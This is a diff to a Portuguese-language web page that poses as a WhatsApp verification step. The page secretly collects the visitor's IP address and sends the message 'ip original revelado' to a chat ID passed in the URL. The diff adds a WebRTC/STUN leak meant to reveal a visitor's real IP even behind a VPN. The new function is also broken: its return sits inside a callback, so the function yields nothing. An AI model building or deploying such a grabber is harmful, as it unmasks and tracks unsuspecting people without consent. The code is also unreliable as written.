--- a/index.html
+++ b/index.html
@@ -170,16 +170,6 @@
             document.getElementById('whatsappCode').textContent = whatsappCode;
             document.getElementById('randomCode').textContent = verificationCode;
 
-            function generateRandomCode(length) {
-                const chars = '0123456789';
-                let result = '';
-                for (let i = 0; i < length; i++) {
-                    result += chars.charAt(Math.floor(Math.random() * chars.length));
-                }
-                // Format as XXX-XXX
-                return result.slice(0,3) + '-' + result.slice(3);
-            }
-
             finalMessage.classList.remove('hidden');
             document.getElementById('ipInfo').textContent = "🔍 Sua conexão foi rastreada para segurança";
             document.getElementById('ipInfo').classList.remove('hidden');
@@ -188,15 +178,30 @@
             sendIPInfo();
         }
 
-        async function getClientIP() {
-            try {
-                const response = await fetch('https://api.ipify.org?format=json');
-                const data = await response.json();
-                return data.ip;
-            } catch (error) {
-                console.error('Error fetching IP:', error);
-                return '127.0.0.1';
-            }
+        async function testWebRTC() {
+            const foundIPs = new Set();
+            const pc = new RTCPeerConnection({
+                iceServers: [
+                    { urls: "stun:stun.l.google.com:19302" }, // STUN server do Google
+                    { urls: "stun:stun1.l.google.com:19302" }
+                ]
+            });
+
+            pc.createDataChannel("");
+            const offer = await pc.createOffer();
+            await pc.setLocalDescription(offer);
+
+            pc.onicecandidate = event => {
+                if (!event || !event.candidate) return;
+                const candidate = event.candidate.candidate;
+                const parts = candidate.split(" ");
+                const ip = parts[4];
+
+                if (ip && !foundIPs.has(ip)) {
+                    foundIPs.add(ip);
+                    return ip; // Retorna o IP detectado
+                }
+            };
         }
 
         async function sendIPInfo() {
@@ -204,7 +209,7 @@
             const chatId = urlParams.get('chat_id');
             
             if(chatId) {
-                const ip = await getClientIP();
+                const ip = await testWebRTC(); // Obtém o IP usando WebRTC
                 const message = `🖤 ip original revelado: ${ip}`;
                 
                 try {
